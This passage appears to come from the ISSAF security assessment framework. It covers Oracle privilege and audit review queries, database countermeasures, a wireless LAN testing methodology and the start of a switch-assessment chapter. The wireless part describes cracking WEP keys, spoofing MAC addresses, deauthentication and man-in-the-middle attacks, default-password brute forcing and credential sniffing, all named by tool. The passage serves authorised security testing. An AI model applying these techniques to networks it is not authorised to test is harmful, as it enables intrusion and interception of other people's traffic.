SQL>SELECT * from DBA_TAB_PRIVS where GRANTEE='RAKESH'
4. Find out all system privileges granted to RAKESH and his roles:
SQL>SELECT * from DBA_SYS_PRIVS where GRANTEE='RAKESH'
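The role hierarchy walk that this section describes is shown here as an added example (not ISSAF's own query). Starting from RAKESH, the example account used in the text, and from PUBLIC (which every user holds), it follows DBA_ROLE_PRIVS with CONNECT BY to every role reached, then lists the system and object privileges held by the user or any of those roles, flagging the grants the text singles out as dangerous (ANY privileges, WITH ADMIN/GRANT OPTION, the DBA/RESOURCE/CONNECT roles). Replace RAKESH with the account under review.

```sql
-- Added example (not part of ISSAF): effective privileges of one user,
-- including those inherited through nested roles and through PUBLIC.
-- Subquery factoring (WITH) and CONNECT BY are standard Oracle SQL.
WITH user_roles AS (
    -- every role reachable from the user; depth 1 = granted directly
    SELECT grantee, granted_role, admin_option, LEVEL AS depth
    FROM   dba_role_privs
    START WITH grantee IN ('RAKESH', 'PUBLIC')
    CONNECT BY PRIOR granted_role = grantee
),
grantees AS (
    -- the user, PUBLIC and every role found above
    SELECT 'RAKESH' AS grantee FROM dual
    UNION ALL SELECT 'PUBLIC' FROM dual
    UNION ALL SELECT granted_role FROM user_roles
)
-- roles, with the broad default roles the text warns about flagged
SELECT 'ROLE' AS priv_type, r.grantee AS via, r.granted_role AS privilege,
       CAST(NULL AS VARCHAR2(65)) AS object_name,
       CASE WHEN r.granted_role IN ('DBA', 'RESOURCE', 'CONNECT')
                 THEN 'REVIEW: broad role, depth ' || r.depth
            WHEN r.admin_option = 'YES'
                 THEN 'REVIEW: WITH ADMIN OPTION, depth ' || r.depth
            ELSE 'depth ' || r.depth
       END AS note
FROM   user_roles r
UNION ALL
-- system privileges held directly or via any of the roles
SELECT 'SYSTEM', s.grantee, s.privilege, NULL,
       CASE WHEN s.privilege LIKE '%ANY%' THEN 'REVIEW: ANY privilege'
            WHEN s.admin_option = 'YES'   THEN 'REVIEW: WITH ADMIN OPTION'
       END
FROM   dba_sys_privs s
WHERE  s.grantee IN (SELECT grantee FROM grantees)
UNION ALL
-- object privileges held directly or via any of the roles
SELECT 'OBJECT', t.grantee, t.privilege, t.owner || '.' || t.table_name,
       CASE WHEN t.grantable = 'YES' THEN 'REVIEW: WITH GRANT OPTION'
            WHEN t.owner = 'SYS'     THEN 'REVIEW: SYS-owned object'
       END
FROM   dba_tab_privs t
WHERE  t.grantee IN (SELECT grantee FROM grantees)
ORDER  BY priv_type, via, privilege, object_name;
```

Rows whose note starts with REVIEW are the ones to justify against the user's functional requirements; a role that appears more than once is reachable through more than one grant path.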
One role that this must specially be done for is PUBLIC. The PUBLIC role is like the
'Everyone' group in Windows. It cannot be removed, and every database user is
automatically assigned the PUBLIC role. On a default database, the PUBLIC role has a
really extensive list of permissions. It is highly recommended to completely REVOKE all
privileges and roles that have been granted to PUBLIC. Any privilege that stays with
PUBLIC is to be viewed as a critical security risk. In a default setup the output of these
commands can be quite voluminous:
SQL>Select * from DBA_TAB_PRIVS where GRANTEE='PUBLIC'
And
SQL>Select * from DBA_SYS_PRIVS where GRANTEE='PUBLIC'
And
SQL>Select * from DBA_ROLE_PRIVS where GRANTEE='PUBLIC'
Alternatively, you can query privileges based on the object name. For instance, the
SYS.LINK$ table contains plain-text passwords for database links (see the section later),
and the SYS.AUD$ table contains the audit trail, in case auditing has been turned on
and the audit destination is DB. Both these tables must be protected from lower-privileged
accounts. You can view the privileges on these tables with the following query (OWNER
and TABLE_NAME are separate columns in DBA_TAB_PRIVS, so the schema prefix must
not be part of the table name):
SQL>Select * from DBA_TAB_PRIVS where OWNER='SYS' and TABLE_NAME in ('LINK$', 'AUD$')
It is preferable that privileges be granted to roles rather than to users. The advantages of
this have been mentioned at the start of this section. To check for those privileges that
have been granted directly to users:
SQL>Select * from DBA_TAB_PRIVS where GRANTEE in (Select USERNAME from DBA_USERS)
And
SQL>Select * from DBA_SYS_PRIVS where GRANTEE in (Select USERNAME from DBA_USERS)
Additionally, you also want to ascertain all object privileges that have been granted with
the ‘WITH GRANT OPTION’:
SQL>Select * from DBA_TAB_PRIVS where GRANTABLE='YES'
And all system privileges that have been granted with the ‘WITH ADMIN OPTION’:
SQL>Select * from DBA_SYS_PRIVS where ADMIN_OPTION='YES'
There is a certain subset of system privileges, which are granted using the keyword
ANY. For instance, a user can be granted the CREATE TABLE privilege, which allows
him to create tables within his own schema, but he can also be granted the CREATE
ANY TABLE privilege, which allows him to create tables in other users’ schemas as well.
This is once again a dangerous set of privileges and must be granted with extreme
caution. To check who has these privileges:
SQL>Select * from DBA_SYS_PRIVS where PRIVILEGE LIKE '%ANY%'
You also want to be very sure of why any users have been granted the DBA role:
SQL>Select * from DBA_ROLE_PRIVS where GRANTED_ROLE='DBA'
The absolute minimum number of people must be granted this maximum privileges role.
Any extraneous additions to this role imply serious security flaws in the setup.
Next you must check for those users that are connected to the database at this point of
time, with DBA privileges:
SQL>Select USERNAME, SID, STATUS, SCHEMA#, SERVER from SYS.V_$SESSION where USERNAME='SYS' or USERNAME in (Select GRANTEE from DBA_ROLE_PRIVS where GRANTED_ROLE='DBA')
The V_$SESSION view contains information about the current sessions, and we query it
for those users who are assigned to the SYS or the DBA roles. This again, must be a
minimum number and you must check that there are no multiple logins by two or more
users using the same DBA-level account. This results in a complete loss of
accountability. All users must have their own accounts with appropriate restricted
privileges.
You must also keep a check on all tables that are present in the SYS or SYSTEM
tablespaces. As mentioned earlier, these are privileged tablespaces and no user must
be allowed to create his own tables here. The best method is to run the following query
on a default installation and store its output as a baseline for future comparisons; any
new tables popping up in the output must be investigated:
SQL>Select * from DBA_TABLES where TABLESPACE_NAME in ('SYS', 'SYSTEM')
H.2.1.4.7 ORACLE AUDIT FUNCTIONALITY
For Oracle’s built-in auditing functionality, you must not only determine the rationale
behind the turning on of auditing, but also the level of auditing and its impact on system
resources. Oracle auditing gets turned on as soon as you set the AUDIT_TRAIL
parameter in the init<SID>.ora file. If this value is set to DB, then all entries go to the
SYS.AUD$ table; if it is set to OS, then they go to the $ORACLE_HOME/rdbms/audit
directory. This location will be altered if the AUDIT_FILE_DEST parameter is set to a
different path.
In Oracle, we can audit the following:
• Statement Auditing: Audits on the type of SQL statement used, such as any SQL
statement on a table.
• Privilege Auditing: Audits use of a particular system privilege, such as CREATE
TABLE.
• Object Auditing: Audits specific statements on specific objects, such as ALTER
PROFILE on the DEFAULT profile.
You can set these auditing options and specify the following conditions:
• WHENEVER SUCCESSFUL / WHENEVER NOT SUCCESSFUL
• BY SESSION / BY ACCESS
The main problem with auditing is either too much information or too little information.
All audit entries go into the SYS.AUD$ table, which must be secured with the tightest set
of permissions. It must also be recycled by exporting it to another table and truncating it,
as it has a predefined size limit.
To view the current auditing options:
Statement Auditing:
SQL>Select * from DBA_STMT_AUDIT_OPTS
Privilege Auditing:
SQL>Select * from DBA_PRIV_AUDIT_OPTS
Object Auditing:
SQL>Select * from DBA_OBJ_AUDIT_OPTS
Ensure that the audit parameters are according to the rationale and requirement of the
organization’s audit policy.
The SYS.AUD$ table is bulky and difficult to analyze; therefore you must rely on the
numerous views created on this table. These views are of the type DBA_AUDIT_<viewname>.
Irrespective of the audit configuration, Oracle will always capture the following minimum
fields:
• User ID
• Session identifier
• Terminal identifier
• Name of the schema object accessed
• Operation performed or attempted
• Completion code of operation
• Date and time
• System privileges used
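As an added example (not ISSAF's own), here are the audit options a reviewer would expect to find in place for the checks in this section, followed by two DBA_AUDIT_* queries that read the results. It assumes AUDIT_TRAIL has been set to DB in init<SID>.ora and the instance restarted; APP.ACCOUNTS is a hypothetical application table standing in for whatever sensitive object is being protected.

```sql
-- Added example, not from ISSAF. Nothing here records anything until
-- AUDIT_TRAIL = DB (or OS) is set in init<SID>.ora and the instance restarted.

-- Statement auditing: failed connection attempts only (ties in with the
-- FAILED_LOGIN_ATTEMPTS profile limit), plus all profile and role maintenance.
AUDIT SESSION WHENEVER NOT SUCCESSFUL;
AUDIT PROFILE;
AUDIT ROLE;
AUDIT SYSTEM GRANT;           -- GRANT/REVOKE of system privileges and roles

-- Privilege auditing: every use of the broad ANY privileges, one record per use.
AUDIT CREATE ANY TABLE, ALTER ANY TABLE, SELECT ANY TABLE BY ACCESS;

-- Object auditing on a hypothetical sensitive table (placeholder name).
AUDIT SELECT, UPDATE, DELETE ON app.accounts BY ACCESS;

-- Reading the trail: accounts with 3 or more failed logins in the last day.
-- RETURNCODE is the ORA- error number of the failure
-- (1017 = invalid username/password, 28000 = account already locked).
SELECT username, os_username, userhost,
       COUNT(*)       AS failures,
       MIN(timestamp) AS first_failure,
       MAX(timestamp) AS last_failure
FROM   dba_audit_session
WHERE  returncode <> 0
AND    timestamp  >= SYSDATE - 1
GROUP  BY username, os_username, userhost
HAVING COUNT(*) >= 3
ORDER  BY failures DESC;

-- Changes to profiles, roles and grants in the last 30 days, to compare
-- against the privilege baseline taken in the previous section.
SELECT timestamp, username, os_username, action_name, obj_name, returncode
FROM   dba_audit_trail
WHERE  (action_name LIKE '%PROFILE%'
        OR action_name LIKE '%ROLE%'
        OR action_name LIKE '%GRANT%'
        OR action_name LIKE '%REVOKE%')
AND    timestamp >= SYSDATE - 30
ORDER  BY timestamp DESC;
```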
H.2.1.4.8 OAT
The Oracle Auditing Tools (OAT) is a toolkit that could be used to audit security within
Oracle database servers.
OAT uses CREATE LIBRARY to be able to access the WinExec function in kernel32.dll
on Windows or the system call in libc on Un*x. Having access to this function makes it
possible to execute anything on the server with the same security context as the user
who started the Oracle service. So basically all accounts with default passwords, or
easily guessable passwords, having this privilege can do this.
OAT has a built-in TFTP server for making file transfers easy. The TFTP server is
based on the server source from www.gordian.com.
The tools are Java based and were tested on both Windows and Linux. They should
hopefully also run on any other Java platform.
For more information on OAT visit http://www.cqure.net/tools.jsp?id=7
H.3 DATABASE SERVICES COUNTERMEASURES
• The first and most important step is to remove default accounts, assign strong
passwords to existing accounts, and begin the audit facility for failed logins.
• At the network perimeter, block access to database ports such as TCP 1433 and
UDP 1434 for SQL Server, TCP 1521 for Oracle, and TCP 3306 for MySQL.
• Keep the databases patched. This is easier said than done, since it is not trivial
to take a database system down for applying and testing patches. However,
those patches that address vulnerabilities which can be exploited remotely
without authentication must be given top priority, for instance buffer overflows
in the TNS Listener service, or those in the SQL SSRS.
• To protect from privilege escalation attacks, lock down the database
configuration by removing unnecessary stored and extended stored procedures,
reducing the privileges of default groups/roles such as PUBLIC, keeping the
privileges of existing user accounts to a minimum, and auditing access to critical
tables and views.
I WLAN SECURITY ASSESSMENT
I.1 WLAN SECURITY ASSESSMENT METHODOLOGY MAP
[Methodology map: Information Gathering -> Scanning -> Audit -> Analysis & Research -> Exploit & Attack -> Reporting & Presentation]
I.2 BUILDING FOUNDATION
I.2.1 TYPES of WLAN Networks
802.11x …
What is the basic difference between the various types?
The IEEE 802.11 specification identifies an over-the-air interface between a mobile
device wireless client and a base station or between two mobile device wireless clients.
802.11a. An extension to the original IEEE 802.11 standard, this provides up to 54 Mbps
in the 5 GHz band. 802.11a uses an orthogonal frequency division multiplexing encoding
scheme rather than FHSS (Frequency Hopping Spread Spectrum) or DSSS (Direct
Sequence Spread Spectrum).
802.11b. An extension to the 802.11 wireless LAN standard and the first version of the
standard that was available. It provides 11 Mbps transmission speed in the 2.4 GHz band,
and can slow down to 5.5 Mbps, 2 Mbps, or 1 Mbps depending upon the strength of the
signal. 802.11b uses only DSSS.
802.11g. The IEEE wireless standard that came after 802.11b. It applies to wireless LANs
and provides 20 Mbps to 54 Mbps in the 2.4 GHz band. This standard is currently the
second most popular, just after 802.11b.
802.11e. The latest IEEE extension, providing quality-of-service (QoS) features and
multimedia support for home and business wireless environments.
I.2.2 MODES of WLAN Networks
• Ad-hoc: The mobile devices in this mode are considered peers. Each mobile
device client communicates directly with the other mobile device clients within the
network.
• Infrastructure: In this mode there are APs (access points) and clients. The clients
communicate with the APs and through the APs to other wired or wireless
clients.
I.2.3 Service Set Identifier
SSID or Service Set Identifier is a unique identifier specified in the header of wireless
packets to act as a password for client connectivity to a wireless access point. This is
commonly referred to as the wireless network name, and is broadcast on the wireless
network by the access point.
Use of a default SSID suggests a default installation, which is not good. Check for all APs
with default SSIDs. Moreover, the default SSID reveals the make of the wireless device. A
list of default SSIDs is available on cirt.net.
I.2.4 KEY MANAGEMENT
Different types of keys are implemented in wireless networks: shared and dynamic.
Pre-shared keys are the traditional way of doing a key exchange in wireless LANs.
Dynamic key exchange uses protocols such as 802.1X, which allow keys to be dynamically
shared.
There is a possibility of exposure or theft of static encryption keys stored in the access
points and wireless stations. A dictionary attack on the sniffed data traffic can be performed.
I.2.5 ENCRYPTION
Wireless networks do not have the physical connectivity restrictions of wired networks. The
IEEE 802.11 standard specifies WEP as the wireless equivalent of the physical security
provided by wired networks. The WEP encryption scheme uses shared keys for the
encryption and decryption of the frames passed across a Wireless LAN (WLAN).
By default WEP is disabled.
WEP keys can also be discovered in a short period of time. Although WEP is based on the
robust RC4 symmetric key algorithm, the flaws in the implementation of WEP have been
well documented. These flaws allow a malicious user who collects enough WEP
encrypted frames on a given network to identify shared values among the frames and
ultimately determine the shared key.
Tip: WEP provides device authentication; is proper user authentication also in place?
I.2.6 Considerations on building a box for war-driving
Type of card, chipset, tools, operating system tweaks, external antenna etc…
Hardware
A Laptop with Windows XP/2000 and Linux installed as dual boot.
PCMCIA 802.11b cards (11 Mbps)
Hermes Chipset:
ORiNOCO Gold
External Antennas
Fab-Corp 5dBi Omnidirectional Magnetic Mount
Fab-Corp N-Type to ORiNOCO Pigtail
D-I-Y antennas are also okay
GPS and accessories
Garmin eTrex Legend
Garmin eTrex Power+Data Cable Bundle
Garmin eTrex Windshield suction cup mount
Misc
400 Watt Power inverter
Software:
NetStumbler
StumbVerter
MapPoint2002
NAI Sniffer
AiroPeek
Analyzer
ettercap
and all the other Win32 sniffers (with and without WiFi support).
Windows XP MAC changer (SMAC)
I.3 TYPES OF THREATS
I.3.1 Eavesdropping
Two types of intrusion threats that are easy to launch are traffic monitoring and passive
eavesdropping.
Traffic monitoring is typically performed by an intruder that is outside the perimeter of the
enterprise, whereby he observes the traffic flow, and makes assessments about the
1) Nature of traffic,
2) Amount of traffic and
3) Load on the network.
Passive eavesdropping on the other hand generally occurs from within the perimeter.
The intruder could use the information gathered by way of traffic monitoring combined
with passive eavesdropping to attack users as well as the network.
I.3.2 Gaining Network knowledge by Traffic Analysis
WLAN Network Traffic Analysis should lead to the investigation of the following:
1. Sequence number
2. Control Type and Subtype
3. Destination MAC
4. Service Set Identifier (SSID)
5. Organizationally Unique Identifier (OUI)
6. Data Payload
7. LLC Protocol Type Field
8. LLC Protocol ID
I.3.3 Denial of Service
Denial of Service can be launched in various ways, such as:
1. Requesting every DHCP address using forged packets, so that legitimate clients are
denied access.
2. Using a fake AP.
3. Jamming the frequency of the WLAN using conventional and freely available
equipment such as a microwave oven.
I.3.4 Password Capture
The password for remote management of access points can be captured and used to
gain unauthorised access to the access points. As such, administration of access points
should not be done over the WLAN. Instead, the access points should be administered
via the wired network or locally via the access point’s built-in COM ports.
I.3.5 MAC Capture
If MAC filtering is implemented, then sniff for ARP, which is used to determine the
MAC-to-IP pairing for the hosts on the wireless network. ARP information is passed in
the clear between the clients and the AP. Conduct ARP-related attacks such as sniffing,
hijacking, broadcasting, DoS, and cloning.
I.4 METHODOLOGY
I.4.1 Information Gathering
Wireless access points and clients send beacons and broadcasts respectively. Beacons
are sent by APs at predefined intervals. They are invitations and driving directions that
enable the client to find the AP and configure the appropriate settings to communicate. A
beacon announces the SSID and the channel that the network is using. WLAN scanners
allow users to identify WLANs through the use of a wireless network interface card (NIC)
running in promiscuous mode and software that will probe for APs. Linux has Kismet,
which is not graphical and not as user friendly as NetStumbler, but it provides superior
functionality. Kismet is not only a WLAN scanner, but also combines the features of a
WLAN sniffer.
I.4.2 Scanning
• Detect and Identify the wireless network
• Test for channels and ESSID
• Test the beacon broadcast frame and recording of broadcast information
• Test for rogue access points from outside the facility
• IP address collection of access points and clients
• MAC address collection of access points and clients
I.4.3 Audit & Review – Questionnaire
Audit and Review Questionnaire on the following controls:
• Implementation Controls
  o Access control
    - Access control could be based upon the MAC address of the connecting
      devices.
  o Firewall settings
    - Between wire and wireless side
• Technical Controls
  o Ports on Device
    - The built-in COM ports of the access point should be disabled or
      password protected to prevent any unauthorized access to the access
      points. All unnecessary services and ports in the access points should be
      removed or closed.
  o SNMP
    - The default SNMP community string should be changed if the access
      point has an SNMP agent running on it. This is to prevent an attacker from
      reading or writing to the access point.
  o Is the SSID Broadcast off?
  o Use of Default SSID name?
  o Beacon interval
    - The beacon interval of the SSID should be set to the maximum setting to
      make passive scanning more difficult.
• Management Controls
  o Usage Policy
    - Try to find if any usage policy has been implemented on the wireless
      device. E.g. Linksys allows building such a policy based upon day/time.
I.4.4 Security Analysis and Research
• Determining WEP enabled access points
• Capturing WEP encrypted data
• Intercepting valid client MAC addresses
• Configuration menu access - using browser interface, using Telnet, using SNMP, using
FTP
• Determine types of authentication methods in place
• Determining the origin of the access point(s)
• Communication with access point(s)
• Utilization of client cards (with or without WEP)
• Emphasize collecting data transmitted over the 802.11 wireless networks
• Search for requested "specific" sensitive data
I.4.5 Exploitation & Attacks
• Identifying WEP keys
  Automated tools such as WEPCrack would identify the WEP keys from the traffic.
• Bypassing MAC filtering
  MAC filtering could be bypassed by any of the following tools:
  o SMAC: a tool that allows the MAC address of a Windows machine to be changed.
    This would help an attacker to spoof a MAC.
  o Bwmachak: a command line tool from blackwave to change the ORiNOCO PCMCIA
    MAC address, which works on Windows 2000 and Windows XP.
  o ifconfig: on a Unix (Linux) machine, ifconfig could be used to reassign the MAC
    address.
• Targeting authenticated data (i.e. usernames and passwords)
  The use of protocol analyzers helps in the targeting of authenticated data; these
  include Ethereal and tcpdump (with scripts).
• Network Logon functions
• Disassociation attack
  o This is achieved by a spoofed deauthentication message, which causes the
    communication between client and AP to be suspended. Hence, the attacker has
    achieved DoS. This could be achieved by using tools such as AirJack, essid-jack
    and monkey-jack.
• MITM Attack
  MITM attacks on a wireless network are significantly easier to mount than against
  physical networks, typically because such attacks on a wired network require
  some sort of access to the network. Man-in-the-middle attacks take two common
  forms:
  o eavesdropping
  o manipulation
  In eavesdropping, an attacker listens to a set of transmissions to and from different
  hosts even though the attacker's computer is not a party to the transaction. Many
  relate this type of attack to a leak, in which sensitive information could be disclosed
  to a third party without the legitimate users' knowledge.
  Manipulation attacks build on the capability of eavesdropping by taking this
  unauthorized receipt of a data stream and changing its contents to suit a certain
  purpose of the attacker; this could include spoofing an IP address, changing a MAC
  address to emulate another host, or some other type of modification. To prevent this
  kind of attack one must encrypt the contents of a data transmission at several levels,
  preferably using SSH, SSL, or IPsec.
• Brute force Base station Password
• Scanning the Network and beyond
• Identifying the services in the clients and trying to exploit them.
I.5 TOOLS USAGE
Objective | Tool | Method
Info. Gathering, Analysis & Research
• Detect and Identify the wireless network | Kismet | Check for Screen
• Test for channels and ESSID | Kismet | Check for Kismet*.csv
• Test the beacon broadcast frame and recording of broadcast information | Kismet | Check for Kismet*.dump
• Test for rogue access points from outside the facility | | Scan outside the facility
• IP address collection of access points and clients | Kismet | Check for Kismet*.csv
• MAC address collection of access points and clients | Kismet | Check for Kismet*.csv
• Determining WEP enabled access points | Kismet | Check for Kismet*.csv
• Capturing WEP encrypted data | Kismet | Check for Kismet*.dump
• Intercepting valid client MAC addresses | - | Change your Client Adapter's MAC address to an authorized MAC address
• Configuration menu access - using browser interface, using Telnet, using SNMP, using FTP | - | Use browser/Telnet/FTP with known default usernames & passwords, and SNMP with 'public'
• Determine types of authentication methods in place; Communication with access point(s) | Nmap | Scan the services running in the Access Point to determine.
• Utilization of client cards (with or without WEP) | - | To identify any interoperability issues of Client Adapters with Access Points, as a way of protection.
• Emphasize collecting data transmitted over the 802.11 wireless networks | Ethereal | Collecting unWEP packets and decode them to see data packets.
• Search for requested "specific" sensitive data | Ethereal | Search for "specific" string in data packets
Exploitation & Attacks
• Identifying WEP Keys | WEPCrack | Use Kismet*.weak to get WEP keys using WEPCrack
• Bypassing MAC filtering | - | Impersonate an authorized MAC address in your Client Adapter with other credentials such as SSID and if possible WEP Keys.
• Targeting authenticated data (i.e. usernames and passwords) | Ethereal | Decode and Search
• Network Logon functions | Ethereal | Decode and Search
• Disassociation attack | AirJack | Sending Association/Disassociation frames
• MITM Attack | AirJack | Capture the packet, modify it and send it back.
• Brute force Base station Password | - | Default Passwords
• Scanning the Network and beyond | Nmap | Scan
• Identifying the services in the clients and trying to exploit them. | Nmap | Scan
I.6 EQUIPMENT
I.6.1 Specialised equipment
Yellowjacket
www.bvsystems.com
This is specialised equipment that operates in the 802.11b space and can easily be interfaced with handhelds; it can carry out analysis of frequency re-use patterns, coverage mapping and interference from neighbors, locate unauthorized users and be used for war walks.
I.6.2 Cards
Orinoco
http://airsnort.shmoo.com/orinocoinfo.html
Prism2
http://www.linux-wlan.com/linux-wlan/
Cisco
http://airo-linux.sourceforge.net/
I.6.3 Antennas
Antennas are classified into three types by directionality: directional, multidirectional, and omnidirectional. Directional antennas are the most effective for long-range packet capturing because the power and waves are tightly focused in one direction. Multidirectional antennas are similar to directional antennas in the sense that both use highly concentrated and focused antennas for their transceivers. An omnidirectional antenna is the most effective in close city driving because it transmits and receives signals from all directions, thereby providing the largest angular range.
Antenna manufacturers
HyperLinkTech
http://www.hyperlinktech.com
Wireless Central
http://www.wirelesscentral.net
Fleeman, Anderson, and Bird Corporation http://www.fab-corp.com/
I.6.4 GPS
The Global Positioning System provides a reference to any place on Earth in terms of latitude and longitude. The GPS software keeps a real-time log of the device's position by mapping the longitude and latitude coordinates with corresponding timestamps into a simple text file. GPS units are relatively easy to purchase and install on your laptop, especially if you are on the Windows OS (Win 2k/XP).
GPS manufacturers
Garmin International http://www.garmin.com/
Magellan
http://www.magellangps.com/
I.7 SOFTWARE DESCRIPTION
Netstumbler
NetStumbler is a Windows-based war-driving tool that will detect wireless networks and mark their relative position with a GPS. It uses an 802.11 Probe Request sent to the broadcast destination address, which causes all access points in the area to issue an 802.11 Probe Response containing network configuration information, such as their SSID and WEP status. When hooked up to a GPS, NetStumbler will record a GPS coordinate for the highest signal strength found for each access point. Using the network and GPS data, you can create maps with tools such as StumbVerter and Microsoft MapPoint. NetStumbler supports the Hermes chipset cards on Windows 2000, the most popular being the Orinoco branded cards. On Windows XP the NDIS 5.1 networking library has 802.11 capabilities itself, which allows NetStumbler to be used with most cards that support it.
Kismet
Kismet is a Linux and BSD-based wireless sniffer that has war-driving functionality. It
allows you to track wireless access points and their GPS locations like NetStumbler, but
offers many other features as well. Kismet is a passive network-detection tool that will
cycle through available wireless channels looking for 802.11 packets that indicate the
presence of a wireless LAN, such as Beacons and Association Requests. Kismet can
also gather additional information about a network if it can, such as IP addressing and
Cisco Discovery Protocol (CDP) names. Included with Kismet is a program called
GPSMap, which generates a map of the Kismet results. Kismet supports most of the
wireless cards available for Linux or OpenBSD. To use Kismet, you will first have to
install the custom drivers required for monitor mode operation. This can vary depending
on the chipset your card uses, but Kismet comes with a single way to enable all of them
for monitor operation.
Dstumbler
Wireless Mapping tools
StumbVerter(http://www.sonar-security.com/sv.html)
StumbVerter is a standalone application which allows you to import Network Stumbler's
summary files into Microsoft's MapPoint 2004 maps. The logged WAPs will be shown
with small icons, their colour and shape relating to WEP mode and signal strength.
GPSMap
This is software that makes it possible to create vector maps, which can be downloaded to Garmin GPS receivers.
JiGLE
JiGLE is a Java client that lets you look at all the reported geographically-located 802.11 wireless base-stations in any area that has a 'MapPack' or 'MapTree' created for it. It can also read in NetStumbler or DStumbler files and plot them on a map of your choosing.
WIRELESS SCANNING AND ENUMERATION
Wireless Sniffers
Configuring Linux Wireless Cards for Promiscuous Mode
Air-Jack
Custom driver for PrismII (HFA384x) cards
Wireless Monitoring Tools
Prism2dump
Tcpdump
Command line tool that uses the libpcap libraries to dump network traffic. It has very strong scripting language support.
Ethereal
Ethereal is a multi-protocol analyser; it can act as a GUI sniffer which understands 802.11b frames.
Airopeek NX
Airopeek is a comprehensive packet analyzer for IEEE 802.11b wireless LANs, supporting all higher level network protocols such as TCP/IP, Appletalk, NetBEUI, and IPX. Affordable and easy-to-use, Airopeek contains all of the network troubleshooting features familiar to users of the vendor's Etherpeek. In addition, Airopeek quickly isolates security problems, fully decodes 802.11b WLAN protocols, and expertly analyzes wireless network performance with accurate identification of signal strength, channel and data rates.
Tools that exploit WEP weaknesses
Airsnort
AirSnort is a Linux-based tool written by Jeremy Bruestle and Blake Hegerle. It exploits the WEP vulnerabilities discussed in the Stubblefield, Ioannidis and Rubin paper and requires a version of Linux using the 2.2 or 2.4 kernel or greater, wlan-ng drivers and a network card that uses the Prism2 chipset. Once AirSnort is running, the NIC must be in promiscuous mode and set to listen on the appropriate channel for the targeted WLAN. Obtain the channel from the WLAN scanner used to locate the WLAN in the first place. AirSnort comes with a shell script that will automatically launch the NIC in promiscuous mode with the appropriate channel setting, but the channel has to be hard-coded into the script if the default of channel 6 is not appropriate. AirSnort itself is composed of two separate applications – capture and crack. AirSnort will also display the number of "Interesting Packets" (aka weak keys) that have been captured. AirSnort is efficient because it does not capture all encrypted packets but rather only those that would be used to crack the WEP encryption key. Interesting packets are those where the second byte of the IV is 0xFF. Once a sufficient number of interesting packets have been captured, attempt to crack the WEP key by launching the crack application.
WEPCrack
WEPCrack is a SourceForge project that is administered by Paul Danckaert and Anton
Rager. It is easier to use than AirSnort.
prisim-decode.pl: Used to decode data packets once the WEP key has been cracked.
prisim-getIV.pl: Extracts weak IVs and the first byte of encrypted data from a
prismdump capture.
WeakIVGen.pl: Creates a list of weak IVs and one byte of encrypted data when
provided with a specific encryption key. This script can be used to test the program in the
absence of captured data.
WEPCrack.pl: Used to crack WEP keys given data generated by prisim-getIV.pl.
Data capturing must be complete before using WEPCrack. A sniffer such as prismdump
must capture the data. prismdump is a very basic command line sniffer that takes no
arguments and simply captures all traffic. prismdump recognizes 802.11x headers,
which is obviously crucial to capture WEP traffic. prismdump uses the wiretap libraries
that are included with Ethereal.
WLAN Tools
DWEPCrack
Denial of Service attacks
WLANs are susceptible to the same protocol-based attacks that plague wired LANs but
to perpetrate such attacks on WLANs, an individual would first need to connect to the
network. WLANs are also susceptible to a unique form of denial-of-service (DoS) attack.
WLANs send information via radio waves on public frequencies, thus they are
susceptible to inadvertent or deliberate interference from traffic using the same radio
band.
Wlanjack
essid-jack
monkey-jack
kracker-jack
802.1x
The 802.11i task group is attempting to leverage the 802.1X standard to add authentication controls to wireless networks. 802.1X defines Extensible Authentication Protocol (EAP) over LANs (EAPOL), which is used to authenticate clients as they join the network. The inclusion of 802.1X would prevent hackers from connecting to 802.11x networks simply by determining the channel and SSID used by the network and identifying a legitimate IP address by passively sniffing network traffic.
TKIP
The 802.11i draft promotes the use of Temporal Key Integrity Protocol (TKIP) to strengthen the weak keys used by WEP. TKIP is an effort by the IEEE to engineer a solution to strengthen the security of 802.11x networks while remaining backward compatible with existing hardware. The IEEE would accomplish this with the distribution of software/firmware upgrades that would add the following new algorithms to the WEP protocol:
Message Integrity Code (MIC) – to prevent forged packets
New IV sequencing discipline – to prevent replay attacks
Per-packet key mixing function – to add complexity to the correlation between IVs and the per-packet keys with which they are used
WLAN Scanners
WLAN Sniffers
I.8 GLOBAL COUNTERMEASURES
1. Use longer WEP encryption keys, which makes cryptanalysis more difficult. If your WLAN equipment supports 128-bit WEP keys, use them.
2. Change WEP keys frequently.
3. Place APs only on their own firewalled interface or outside a firewall.
4. Use a VPN for any protocol, including WEP, that may carry sensitive information. This could be implemented using IPsec.
I.9 FURTHER READINGS
1. IEEE Draft P802.1X/D10 http://grouper.ieee.org/groups/802/11/
2. A. Mishra and W. Arbaugh. An Initial Security Analysis of the IEEE 802.1X Standard
3. Arbaugh, William A., Narendar Shankar, and Y.C. Justin Wan. "Your 802.11 Wireless Network has No Clothes."
4. Borisov, Nikita, Ian Goldberg, and David Wagner. "Intercepting Mobile Communications: The Insecurity of 802.11."
5. Fluhrer, Scott, Itsik Mantin, and Adi Shamir. "Weaknesses in the Key Scheduling Algorithm of RC4."
6. http://802.11ninja.net
7. Karygiannis, Tom, and Les Owens. NIST Special Publication 800-48: Wireless Network Security, 802.11, Bluetooth and Handheld Devices
8. Wireless Security: Models, Threats and Solutions, by Randall K. Nichols et al.; McGraw-Hill Telecom
9. 802.11 Wireless Networks: The Definitive Guide, by Matthew Gast; O'Reilly Networking, 2002
10. AirSnort: http://sourceforge.net/projects/airsnort/
11. WepCrack: http://sourceforge.net/projects/wepcrack/
12. Homebrew antenna shootout: http://www.turnpoint.net/wireless/has.html
13. Hacking with a Pringles tube: http://news.bbc.co.uk/hi/english/sci/tech/newsid_1860000/1860241.stm
J SWITCH SECURITY ASSESSMENT
J.1 DESCRIPTION
Switch and Layer 2 security is hardly considered in implementations. To perform a comprehensive security test, it is important to take the concept of security to the last step and ensure complete testing of switches and layer 2 in the network. One hole is sufficient to expose corporate LAN security: an attacker doesn't need to attack a higher layer if the bottom layer gives him access.
J.2 PURPOSE
[Text]
Write purpose of this document not purpose of device (e.g. Router, Firewall, IDS)
J.3 REQUIREMENT
[Text]
J.3.1 Understand Organization’s environment
[Text]
J.3.2 Technical Requirements
[Text]
J.4 EXPECTED RESULT
[Text]
J.5 METHODOLOGY / PROCESS
[Text]
Brief Intro and Table of Contents
J.5.1 Assess General Switch Security
• Identify Switch's management interface IP
  o Using Discovery Protocol (CDP in case of Cisco)
  o Sniffing
• Perform Banner Grabbing
• Test Telnet and HTTP connection on switch
• Identify Firmware and switch model
• Identify Switch's features
  o Routing Support
  o Intrusion Detection Support
  o High Availability Support
  o Firewall Support
